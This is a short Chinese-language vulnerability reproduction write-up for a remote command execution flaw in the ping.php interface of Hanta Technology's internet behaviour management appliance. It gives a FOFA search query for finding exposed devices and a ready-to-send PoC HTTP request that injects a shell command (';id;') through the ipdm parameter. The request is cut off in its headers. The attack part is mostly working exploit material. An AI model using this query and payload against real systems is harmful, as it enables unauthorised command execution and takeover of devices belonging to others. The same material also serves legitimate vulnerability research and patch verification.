汉塔科技-上网行为管理系统 ping.php 远程命令执行漏洞复现

0x01 产品简介

汉塔科技是一家专注于网络应用软件开发的公司，在网络安全、网络协议分析以及网络数据流控制等领域拥有丰富的经验和雄厚的技术实力。其上网行为管理系统是应用识别丰富、网络安全防护强大的专业设备之一，汉塔科技上网行为管理系统是一款功能强大、应用识别丰富且易于操作的专业设备。它能够帮助网络管理者全面监控和管理用户的上网行为，确保网络环境的安全和稳定。

0x02 漏洞概述

汉塔科技-上网行为管理系统 ping.php 接口存在远程命令执行漏洞，经过身份验证的恶意攻击者可以利用该漏洞远程执行任意命令，获取系统权限。

0x03 复现环境

FOFA：body="Antasys"

0x04 漏洞复现

PoC

GET /dgn/dgn_tools/ping.php?ipdm=127.0.0.1;id;&ps=64&cnt=1 HTTP/1.1
Host: 
Priority: u=0, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accep